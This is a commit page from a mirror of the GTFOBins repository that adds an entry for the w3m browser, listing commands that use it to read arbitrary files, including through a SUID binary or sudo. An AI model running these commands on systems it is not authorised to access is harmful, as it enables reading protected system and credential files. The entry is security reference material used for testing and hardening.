1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
pad0van 2022-12-16 20:26:40 +08:00 committed by GitHub
parent 2a12cf1268
commit 4ef0f42962
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

15
_gtfobins/w3m.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
w3m "$LFILE" -dump
suid:
- code: |
LFILE=file_to_read
./w3m "$LFILE" -dump
sudo:
- code: |
LFILE=file_to_read
sudo w3m "$LFILE" -dump
---